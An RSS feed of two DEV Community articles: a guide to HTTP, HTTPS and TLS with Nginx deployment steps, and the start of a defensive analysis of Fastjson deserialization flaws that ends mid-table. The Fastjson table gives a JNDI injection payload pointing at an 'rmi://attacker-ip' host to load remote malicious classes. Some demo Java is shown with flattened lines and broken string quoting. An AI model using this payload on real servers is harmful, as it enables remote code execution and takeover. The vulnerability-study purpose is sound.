<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Tiger Smith</title>
    <description>The latest articles on DEV Community by Tiger Smith (@tiger_smith_9f421b9131db5).</description>
    <link>https://dev.to/tiger_smith_9f421b9131db5</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/tiger_smith_9f421b9131db5"/>
    <language>en</language>
    <item>
      <title>HTTP vs HTTPS vs SSL/TLS: A Comprehensive Guide to Web Security Protocols (with HTTPS Deployment Steps)</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Mon, 08 Dec 2025 21:48:51 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/http-vs-https-vs-ssltls-a-comprehensive-guide-to-web-security-protocols-with-https-deployment-1l42</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/http-vs-https-vs-ssltls-a-comprehensive-guide-to-web-security-protocols-with-https-deployment-1l42</guid>
      <description>&lt;p&gt;Have you ever noticed the difference between “http://” and “https://” when typing a URL? What does the small lock icon next to the address bar signify when you make a payment on an e-commerce platform or log into a social media account? In internet communications, terms like HTTP, HTTPS, and SSL/TLS appear frequently—they are not only core technologies safeguarding network security but also “barometers” for ordinary users to perceive online safety.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/http-vs-https-vs-ssl-tls-a-comprehensive-guide-to-web-security-protocols-with-https-deployment-steps.html" rel="noopener noreferrer"&gt;# HTTP vs HTTPS vs SSL/TLS: A Comprehensive Guide to Web Security Protocols (with HTTPS Deployment Steps)&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;This guide will break down the relationships and functions of these technologies from the perspectives of protocol essence, working mechanisms, and security logic. It also includes practical HTTPS deployment steps, helping developers, website owners, and tech enthusiasts decode the “security passwords” behind web communications.&lt;/p&gt;

&lt;h2&gt;
  
  
  I. HTTP: The “Bare” Foundation of Internet Data Transmission
&lt;/h2&gt;

&lt;p&gt;HTTP (Hypertext Transfer Protocol), proposed by Tim Berners-Lee in 1990, is a core protocol in the application layer of the TCP/IP model. It lays the groundwork for web resource transmission as a stateless request-response protocol, defining interaction standards between clients (e.g., browsers) and servers—similar to a standardized “data communication template.” However, security mechanisms were not integrated into its initial design, leaving data transmission in a “plaintext exposed” state.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 The “Request-Response” Workflow of HTTP (Taking Access to &lt;a href="https://www.example.com/" rel="noopener noreferrer"&gt;tools.devresourcehub.com&lt;/a&gt; as an Example)
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Request Message Construction&lt;/strong&gt;: After entering a URL, the browser encapsulates an HTTP request message, consisting of a request line (e.g., “GET /index.html HTTP/1.1”), request headers (e.g., “User-Agent: Mozilla/5.0”, “Cookie: sessionid=xxx”), and an optional request body (carrying form data for POST requests).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;TCP Connection Establishment&lt;/strong&gt;: HTTP relies on the reliable transmission service provided by TCP. The client establishes a connection with the server’s port 80 through a three-way handshake (“SYN→SYN-ACK→ACK”) to ensure the order and integrity of data transmission.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Server Response Processing&lt;/strong&gt;: Upon receiving the request, the server executes corresponding business logic (e.g., database queries, static resource reading) and generates a response message. This includes a status line (e.g., “HTTP/1.1 200 OK”), response headers (e.g., “Content-Type: text/html; charset=utf-8”, “Content-Length: 1024”), and a response body (resources like HTML, CSS, and JS).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Connection Release and Rendering&lt;/strong&gt;: The browser parses the response body and completes DOM rendering. If the Keep-Alive persistent connection mechanism of HTTP/1.1 is not enabled, TCP releases the connection through a four-way handshake (“FIN→ACK→FIN→ACK”), requiring a new connection for each subsequent request.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  1.2 Three Fatal Flaws of HTTP (Still Plaguing Some Websites Today)
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Plaintext Transmission Risk&lt;/strong&gt;: All communication data is transmitted in ASCII plaintext. Attackers can intercept data packets through ARP spoofing, router sniffing, or other methods to directly extract sensitive information. For example, unencrypted HTTP login requests can be captured by Wireshark on public WiFi, leading to the leakage of account passwords.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Lack of Identity Authentication&lt;/strong&gt;: The HTTP protocol has no mechanism to verify server identity. Attackers can launch man-in-the-middle attacks by hijacking DNS or setting up fake servers. In a phishing incident, attackers forged a bank’s HTTP website, resulting in the leakage of bank card information from thousands of users.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Compromised Data Integrity&lt;/strong&gt;: Without a data verification mechanism, attackers can tamper with HTTP messages in transit. For instance, in e-commerce scenarios, an attacker could modify the “Price” field in the response message from $1999 to $99, causing economic losses to the merchant.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;⚠️ &lt;strong&gt;Key Note&lt;/strong&gt;: Major browsers like Chrome and Firefox now forcibly mark HTTP websites as “Not Secure,” and Google Search significantly demotes their rankings—using HTTP for website building no longer holds practical value in modern web environments.&lt;/p&gt;

&lt;h2&gt;
  
  
  II. SSL/TLS: The “Security Shield” of HTTPS, Current Mainstream Algorithms
&lt;/h2&gt;

&lt;p&gt;To address HTTP’s security vulnerabilities, Netscape launched the SSL (Secure Sockets Layer) protocol in 1994. After iterations through SSL 2.0 and 3.0, the IETF standardized it as the TLS (Transport Layer Security) protocol in 1999. Currently, TLS 1.2 remains the most widely compatible base version, while TLS 1.3 has become the optimal choice for performance and security due to optimized handshake processes (reduced from 4 to 2 interactions) and upgraded cipher suites (removing weak algorithms like 3DES and RC4). TLS 1.0 and 1.1 have been fully deprecated by major browsers and server vendors due to security vulnerabilities such as BEAST and POODLE.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Core Technology: The “Golden Combination” of Symmetric and Asymmetric Encryption
&lt;/h3&gt;

&lt;p&gt;SSL/TLS’s essence lies in combining the advantages of two encryption algorithms to balance “security” and “efficiency”:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Encryption Type&lt;/th&gt;
&lt;th&gt;Key Features&lt;/th&gt;
&lt;th&gt;Use Cases&lt;/th&gt;
&lt;th&gt;Limitations&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Symmetric Encryption (e.g., AES-256-GCM)&lt;/td&gt;
&lt;td&gt;Single key for encryption/decryption; fast operation (100-1000x faster than asymmetric encryption)&lt;/td&gt;
&lt;td&gt;Encrypting large volumes of actual data (web content, files)&lt;/td&gt;
&lt;td&gt;Risk of key interception during distribution&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Asymmetric Encryption (e.g., ECC/RSA)&lt;/td&gt;
&lt;td&gt;Public key (publicly accessible) for encryption; private key (confidential) for decryption; high security&lt;/td&gt;
&lt;td&gt;Securely exchanging symmetric keys; verifying server identity&lt;/td&gt;
&lt;td&gt;Slow operation; unsuitable for large-scale data encryption&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Collaboration Logic&lt;/strong&gt;: SSL/TLS adopts a hybrid architecture of “asymmetric encryption for key exchange + symmetric encryption for data transmission.” During the handshake phase, asymmetric encryption (e.g., ECC) is used to securely distribute the “pre-master secret,” preventing key interception in transit. After the handshake, both parties generate a session key (symmetric key) based on the pre-master secret and random numbers. All subsequent application-layer data is encrypted using symmetric algorithms like AES-256-GCM, balancing security and transmission efficiency.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.2 TLS 1.3 Handshake Process (Optimized Version with Only 2 Interactions)
&lt;/h3&gt;

&lt;p&gt;The handshake is the core of SSL/TLS for establishing a secure connection. TLS 1.3 simplifies steps compared to TLS 1.2, significantly improving access speed:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Client Hello&lt;/strong&gt;: The client sends a message to the server containing a list of supported TLS versions (e.g., TLS 1.3/TLS 1.2), supported cipher suites (e.g., TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256), a 32-byte client random number, and extension fields (e.g., ALPN protocol negotiation).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Server Hello + Certificate + Key Exchange&lt;/strong&gt;: After selecting the optimal configuration, the server returns a Server Hello message (confirming the TLS version and cipher suite), a digital certificate (issued by a trusted CA, containing the server’s public key, domain name, validity period, etc.), and key exchange parameters (e.g., ECDHE ephemeral public key). The client verifies the validity of the certificate chain using built-in CA root certificates; if verification fails, a browser security warning is triggered.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Key Derivation and Verification&lt;/strong&gt;: The client encrypts the “pre-master secret” with the server’s public key, then generates a master key using the HKDF (Key Derivation Function) combined with the client random number and server random number. It further derives a session key (for data encryption) and a MAC key (for integrity verification).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Handshake Finished&lt;/strong&gt;: Both parties encrypt a “Finished” message using the session key, which contains a hash of all messages during the handshake. If the receiver decrypts the message and the hash values match, the handshake is confirmed successful, and the secure channel is officially established.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  2.3 Essential Differences Between SSL/TLS Handshake and TCP Three-Way Handshake
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Comparison Dimension&lt;/th&gt;
&lt;th&gt;SSL/TLS Handshake&lt;/th&gt;
&lt;th&gt;TCP Three-Way Handshake&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Core Purpose&lt;/td&gt;
&lt;td&gt;Establish an encrypted channel, verify identity, exchange keys&lt;/td&gt;
&lt;td&gt;Establish a reliable transmission channel, confirm send/receive capabilities&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Working Layer&lt;/td&gt;
&lt;td&gt;Between transport layer and application layer&lt;/td&gt;
&lt;td&gt;Transport layer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Security&lt;/td&gt;
&lt;td&gt;Provides eavesdropping prevention, tampering prevention, and forgery prevention&lt;/td&gt;
&lt;td&gt;No security mechanisms; only ensures reliable data transmission&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Implementation Mechanism&lt;/td&gt;
&lt;td&gt;Relies on asymmetric encryption (e.g., RSA), symmetric encryption (e.g., AES), and digital certificates&lt;/td&gt;
&lt;td&gt;Based on interactions of three control messages: “SYN”, “SYN-ACK”, “ACK”&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Number of Interactions&lt;/td&gt;
&lt;td&gt;2 interactions for TLS 1.3; 4 interactions for TLS 1.2&lt;/td&gt;
&lt;td&gt;Fixed 3 interactions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Application Scenarios&lt;/td&gt;
&lt;td&gt;Secure communication scenarios like HTTPS, FTPS, SMTPS&lt;/td&gt;
&lt;td&gt;All TCP-based communication scenarios like HTTP, FTP, Telnet&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;In simple terms: The TCP three-way handshake “builds a road,” while the SSL/TLS handshake “installs door locks and monitoring on the road.”&lt;/p&gt;

&lt;h2&gt;
  
  
  III. HTTPS: The Secure Upgrade of HTTP, From Principles to Deployment
&lt;/h2&gt;

&lt;p&gt;HTTPS (HTTP Secure) is a security-enhanced version of the HTTP protocol. By inserting an SSL/TLS encryption layer between HTTP and TCP, it achieves confidentiality, integrity, and identity authentication of application-layer data. It uses port 443 by default and follows an architecture of “encrypted tunnel + plaintext protocol”—SSL/TLS handles underlying encrypted data transmission, while HTTP manages upper-layer application logic interactions. Together, they form the security standard for modern web communications.&lt;/p&gt;

&lt;h3&gt;
  
  
  3.1 Why HTTPS Is Indispensable Today: Four Core Values
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Privacy Protection&lt;/strong&gt;: Sensitive user data such as login credentials and payment information is transmitted encrypted. Even if intercepted, the data cannot be decrypted.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Trust Endorsement&lt;/strong&gt;: Verifies website identity through digital certificates issued by trusted CAs (Certificate Authorities), eliminating phishing sites.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;SEO Advantage&lt;/strong&gt;: Google lists HTTPS as a ranking signal. Under the same conditions, HTTPS websites receive over 30% more traffic than HTTP sites.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Compliance Requirements&lt;/strong&gt;: Regulations such as the EU’s GDPR and China’s Personal Information Protection Law mandate HTTPS for processing sensitive data. Violations can result in fines of up to 4% of global annual turnover.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3.2 Full HTTPS Communication Process (From URL Entry to Webpage Rendering)
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt; The browser initiates a TCP three-way handshake to the server’s port 443 to establish a basic connection.&lt;/li&gt;
&lt;li&gt; Both parties perform a TLS 1.3 handshake to negotiate encryption rules and generate a session key.&lt;/li&gt;
&lt;li&gt; The browser sends an encrypted HTTP request (e.g., GET /index.html).&lt;/li&gt;
&lt;li&gt; The server decrypts the request with the session key, processes it, and returns an encrypted HTTP response.&lt;/li&gt;
&lt;li&gt; The browser decrypts the response, parses it, and renders the webpage.&lt;/li&gt;
&lt;li&gt; After data transmission is complete, SSL/TLS closes the secure connection, and TCP releases the connection through a four-way handshake.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  3.3 Practical HTTPS Deployment Guide (Beginner-Friendly)
&lt;/h3&gt;

&lt;p&gt;💡 &lt;strong&gt;Recommended Tools&lt;/strong&gt;: Let’s Encrypt (free certificates), Certbot (automated deployment), Nginx/Apache (server configuration)&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Certificate Application and Verification&lt;/strong&gt;: Use an ACME protocol client (e.g., Certbot) to connect to Let’s Encrypt and verify domain ownership through DNS-01 or HTTP-01 challenges. For DNS verification, add a TXT record to domain resolution; for HTTP verification, place a specific verification file on the server. Once verified, you can obtain PEM-format files containing the certificate chain (server certificate, intermediate certificate) with a 90-day validity period. Configure a crontab task for automatic renewal (e.g., “0 0 1 * * certbot renew”).&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Server Configuration Optimization&lt;/strong&gt;: For Nginx, in addition to basic SSL configuration, add security enhancements:plaintext&lt;code&gt;ssl_protocols TLSv1.2 TLSv1.3; ssl_prefer_server_ciphers on; ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH"; ssl_session_cache shared:SSL:10m; ssl_session_timeout 10m;&lt;/code&gt;Here, &lt;code&gt;ssl_protocols&lt;/code&gt; explicitly disables older TLS versions, and &lt;code&gt;ssl_ciphers&lt;/code&gt; prioritizes forward secrecy algorithms.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;HSTS and Redirect Configuration&lt;/strong&gt;: Add an HSTS response header in the Nginx configuration and set up a 301 permanent redirect from HTTP to HTTPS:plaintext&lt;code&gt;server {listen 80; server_name example.com; return 301 https://$host$request_uri;} add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;&lt;/code&gt;HSTS forces browsers to use HTTPS directly for subsequent visits, preventing SSL stripping attacks.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Post-Deployment Testing and Tuning&lt;/strong&gt;: Use the SSL Labs Test tool for a security score, aiming for an A+ rating. Common optimization points include enabling OCSP Stapling to reduce certificate verification time, configuring HTTP/2 to improve concurrency performance, and disabling SSL session tickets to avoid key reuse risks.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  IV. Common Misconceptions: Pitfalls to Avoid with HTTPS
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Q1: Does HTTPS Use Asymmetric Encryption for All Data Transmission?
&lt;/h3&gt;

&lt;p&gt;No. Asymmetric encryption is only used to exchange keys during the handshake phase. Actual data transmission relies on symmetric encryption—using asymmetric encryption for all data would slow down webpage loading by more than 10 times due to its low speed.&lt;/p&gt;

&lt;h3&gt;
  
  
  Q2: Is HTTPS 100% Secure?
&lt;/h3&gt;

&lt;p&gt;No. HTTPS security depends on end-to-end secure configuration, with three key risk points requiring careful prevention:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Certificate Trust Chain Issues&lt;/strong&gt;: Self-signed certificates or incorrectly configured intermediate certificates will cause browsers to distrust the site. A company once experienced a 4-hour HTTPS service outage in 2024 due to an expired intermediate certificate.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Vulnerable Cipher Suites&lt;/strong&gt;: Websites using TLS 1.0 or RC4 algorithms are prone to cracking. An e-commerce platform in 2024 suffered a data breach affecting 100,000 users due to enabling weak cipher suites.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Configuration Defects&lt;/strong&gt;: Not enabling HSTS may expose the site to SSL stripping attacks, while an incomplete certificate chain increases verification time.Regular security scans (e.g., using OpenVAS) and configuration audits are necessary to ensure the HTTPS environment complies with OWASP security standards.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Q3: Are Free Certificates Less Secure Than Paid Ones?
&lt;/h3&gt;

&lt;p&gt;No difference in security. Free certificates from Let’s Encrypt offer the same encryption strength as paid certificates from Symantec. The only differences are that paid certificates provide enterprise identity verification (EV certificates) and technical support—free certificates are sufficient for personal blogs or small-to-medium enterprises.&lt;/p&gt;

&lt;h2&gt;
  
  
  V. Conclusion: The Evolution and Future of Web Security Protocols
&lt;/h2&gt;

&lt;p&gt;The evolution from HTTP to HTTPS reflects the transformation of internet security architecture from “function-first” to a “zero-trust” model. As quantum computing technology advances, post-quantum cryptography (PQC) has begun to integrate with the TLS protocol. NIST-recommended algorithms like CRYSTALS-Kyber are gradually becoming standard for key encapsulation to defend against future quantum computing attacks on RSA/ECC algorithms.&lt;/p&gt;

&lt;p&gt;For enterprises and developers, HTTPS is not only a compliance requirement but also a core infrastructure for building user trust and ensuring business continuity. A regular security operation and maintenance mechanism should be established, including certificate lifecycle management, encryption algorithm upgrades, and security vulnerability response, to maintain communication security amid technological iterations.&lt;/p&gt;

&lt;p&gt;The next time you see the small lock icon in your browser’s address bar, remember: it represents a security barrier jointly constructed by TCP/IP’s reliable transmission, SSL/TLS’s encryption protection, and HTTP’s application interaction. Whether building a website or browsing the web, security is always the top priority of the internet.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Deep Dive into Fastjson Deserialization Vulnerabilities: From Principles to Practical Defense</title>
      <dc:creator>Tiger Smith</dc:creator>
      <pubDate>Tue, 25 Nov 2025 14:22:20 +0000</pubDate>
      <link>https://dev.to/tiger_smith_9f421b9131db5/deep-dive-into-fastjson-deserialization-vulnerabilities-from-principles-to-practical-defense-2ka6</link>
      <guid>https://dev.to/tiger_smith_9f421b9131db5/deep-dive-into-fastjson-deserialization-vulnerabilities-from-principles-to-practical-defense-2ka6</guid>
      <description>&lt;p&gt;As one of the most widely used JSON parsing libraries in the Java ecosystem, Fastjson is favored for its high performance. However, its deserialization vulnerabilities—especially CVE-2022-25845—have repeatedly led to large-scale security incidents. Attackers only need to construct malicious JSON strings to achieve Remote Code Execution (RCE) and take full control of servers. This article breaks down the vulnerability’s root cause, dissects bypass techniques across versions with hands-on examples, and finally presents enterprise-grade defense strategies to help you eliminate risks completely.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source of the article:&lt;a href="https://devresourcehub.com/deep-dive-into-fastjson-deserialization-vulnerabilities-from-principles-to-practical-defense.html" rel="noopener noreferrer"&gt;# Deep Dive into Fastjson Deserialization Vulnerabilities: From Principles to Practical Defense&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  I. Core Principle of Fastjson Vulnerabilities: AutoType Mechanism Is the Root Cause
&lt;/h2&gt;

&lt;p&gt;The deserialization vulnerability in Fastjson essentially stems from &lt;strong&gt;security flaws in the AutoType mechanism&lt;/strong&gt;. Originally designed to simplify the restoration of complex object types, this mechanism was exploited by attackers to load malicious classes and trigger dangerous operations.&lt;/p&gt;

&lt;h3&gt;
  
  
  1.1 How the AutoType Mechanism Works
&lt;/h3&gt;

&lt;p&gt;When Fastjson parses JSON containing the &lt;code&gt;@type&lt;/code&gt; field, it follows these steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; &lt;strong&gt;Extract Class Name&lt;/strong&gt;: Read the fully qualified name of the target class (e.g., &lt;code&gt;com.sun.rowset.JdbcRowSetImpl&lt;/code&gt;) from the &lt;code&gt;@type&lt;/code&gt; field.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Class Loading&lt;/strong&gt;: Load the specified class via &lt;code&gt;ClassLoader&lt;/code&gt;, prioritizing cached or configured classes.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Object Instantiation&lt;/strong&gt;: Create an instance of the class using its default constructor or inject properties via setter methods.&lt;/li&gt;
&lt;li&gt; &lt;strong&gt;Trigger Dangerous Logic&lt;/strong&gt;: If the class contains risky methods (such as JNDI lookup or reflective code execution—e.g., &lt;code&gt;setDataSourceName&lt;/code&gt; in &lt;code&gt;JdbcRowSetImpl&lt;/code&gt;), these methods are automatically invoked during property injection, ultimately leading to RCE.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  1.2 Key Exploit Chain for Vulnerabilities
&lt;/h3&gt;

&lt;p&gt;Attackers leverage the combination of &lt;strong&gt;automatic setter invocation&lt;/strong&gt; and &lt;strong&gt;JNDI injection&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Automatic Setter Invocation&lt;/strong&gt;: During deserialization, Fastjson automatically calls the setter methods of all object properties. Even for private properties, adding &lt;code&gt;Feature.SupportNonPublicField&lt;/code&gt; enables this invocation.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;JNDI Injection&lt;/strong&gt;: Classes like &lt;code&gt;JdbcRowSetImpl&lt;/code&gt; initiate JNDI queries in their &lt;code&gt;setDataSourceName&lt;/code&gt; method. If an attacker-controlled RMI/LDAP address is passed, the server will load remote malicious classes and execute malicious code.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  II. Practical Guide to Fastjson’s Key APIs: Serialization &amp;amp; Deserialization
&lt;/h2&gt;

&lt;p&gt;Before analyzing vulnerabilities, it’s critical to understand Fastjson’s core API usage—this forms the basis for identifying exploit scenarios.&lt;/p&gt;

&lt;h3&gt;
  
  
  2.1 Dependency Configuration (Vulnerable vs. Secure Versions)
&lt;/h3&gt;

&lt;p&gt;First, a critical note: &lt;strong&gt;All 1.x versions below 1.2.83 and 2.x versions below 2.0.45 have security risks&lt;/strong&gt;. Vulnerable versions must be avoided in production.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;lt;!-- Dangerous: Versions like 1.2.24 (CVE-2017-18349) and 1.2.47 (cache bypass vulnerability) --&amp;gt;
&amp;lt;dependency&amp;gt;
    &amp;lt;groupId&amp;gt;com.alibaba&amp;lt;/groupId&amp;gt;
    &amp;lt;artifactId&amp;gt;fastjson&amp;lt;/artifactId&amp;gt;
    &amp;lt;version&amp;gt;1.2.47&amp;lt;/version&amp;gt; &amp;lt;!-- Vulnerable version: DO NOT USE --&amp;gt;
&amp;lt;/dependency&amp;gt;

&amp;lt;!-- Secure: Recommend 1.2.83+ for 1.x, 2.0.45+ for 2.x --&amp;gt;
&amp;lt;dependency&amp;gt;
    &amp;lt;groupId&amp;gt;com.alibaba&amp;lt;/groupId&amp;gt;
    &amp;lt;artifactId&amp;gt;fastjson&amp;lt;/artifactId&amp;gt;
    &amp;lt;version&amp;gt;1.2.83&amp;lt;/version&amp;gt; &amp;lt;!-- Patched version with all known vulnerabilities fixed --&amp;gt;
&amp;lt;/dependency&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2.2 Hands-On with Core APIs: Using the &lt;code&gt;User&lt;/code&gt; Class
&lt;/h3&gt;

&lt;p&gt;We first define a &lt;code&gt;User&lt;/code&gt; class with print statements in getters/setters to visually demonstrate when methods are invoked:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package org.example;

public class User {
    private String name;
    private int age;

    // No-arg constructor (required for deserialization; errors occur without it)
    public User() {}

    // Parameterized constructor
    public User(String name, int age) {
        this.name = name;
        this.age = age;
    }

    // Getter: Automatically called during serialization (to read property values)
    public String getName() {System.out.println("Triggered getName(): Reading'name'for serialization");
        return name;
    }

    // Setter: Automatically called during deserialization (to inject property values)
    public void setName(String name) {System.out.println("Triggered setName(): Injecting'name'for deserialization");
        this.name = name;
    }

    // Omitted getter/setter for 'age' (logic matches above)
    public int getAge() { return age;}
    public void setAge(int age) {this.age = age;}

    @Override
    public String toString() {return "User{name='" + name + "', age=" + age + "}";
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2.2.1 Serialization: Convert Java Objects to JSON
&lt;/h4&gt;

&lt;p&gt;The core method is JSON.toJSONString(), with critical configuration in SerializerFeature (e.g., WriteClassName adds the @type field—this poses hidden risks for deserialization vulnerabilities).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;public class FastjsonDemo {public static void main(String[] args) {User user = new User("Zhang San", 25);

        // 1. Basic serialization: No @type field
        String basicJson = JSON.toJSONString(user);
        System.out.println("Basic serialization result:" + basicJson);
        // Output: Triggered getName(): Reading 'name' for serialization → Basic serialization result: {"age":25,"name":"Zhang San"}

        // 2. Serialization with @type (enable WriteClassName)
        String withTypeJson = JSON.toJSONString(
            user, 
            SerializerFeature.WriteClassName, // Add @type field
            SerializerFeature.PrettyFormat    // Format output for readability
        );
        System.out.println("Serialization with @type:\n" + withTypeJson);
        // Output: Triggered getName() → Serialization with @type:
        // {
        //     "@type":"org.example.User",
        //     "age":25,
        //     "name":"Zhang San"
        // }
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  2.2.2 Deserialization: Convert JSON to Java Objects
&lt;/h4&gt;

&lt;p&gt;The core method is &lt;code&gt;JSON.parseObject()&lt;/code&gt;, with risks concentrated in &lt;code&gt;Feature.SupportAutoType&lt;/code&gt; (enables &lt;code&gt;@type&lt;/code&gt; parsing when activated) and &lt;code&gt;Feature.SupportNonPublicField&lt;/code&gt; (allows injection of private properties).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;public class FastjsonDemo {public static void main(String[] args) {String json = "{"@type":"org.example.User","age":25,"name":"Zhang San"}";

        // 1. Basic deserialization: Specify target class
        User user1 = JSON.parseObject(json, User.class);
        System.out.println("Basic deserialization result:" + user1);
        // Output: Triggered setName(): Injecting 'name' for deserialization → Basic deserialization result: User{name='Zhang San', age=25}

        // 2. Enable AutoType (HIGH RISK! DO NOT use in production)
        User user2 = JSON.parseObject(
            json, 
            User.class, 
            Feature.SupportAutoType // Explicitly enable AutoType (extremely risky)
        );
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  III. Vulnerabilities &amp;amp; Bypass Techniques Across Versions: From 1.2.24 to 1.2.80
&lt;/h2&gt;

&lt;p&gt;Fastjson’s developers have repeatedly patched vulnerabilities, but attackers continue to find bypass methods. The table below summarizes key vulnerabilities and practical payloads for each version—essential references for vulnerability detection and defense.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Affected Versions&lt;/th&gt;
&lt;th&gt;Vulnerability Type&lt;/th&gt;
&lt;th&gt;Core Bypass Technique&lt;/th&gt;
&lt;th&gt;Practical Payload (Key Snippet)&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1.2.24 and earlier&lt;/td&gt;
&lt;td&gt;Deserialization RCE&lt;/td&gt;
&lt;td&gt;AutoType enabled by default; no blacklist&lt;/td&gt;
&lt;td&gt;&lt;code&gt;{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker-ip:1099/malicious-class","autoCommit":true}&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;No extra configuration; triggers JNDI injection directly&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;1.2.25 ~ 1.2.41&lt;/td&gt;
&lt;td&gt;Blacklist Bypass (L;)&lt;/td&gt;
&lt;td&gt;Use JVM type descriptor (L-prefixed, ;-suffixed)&lt;/td&gt;
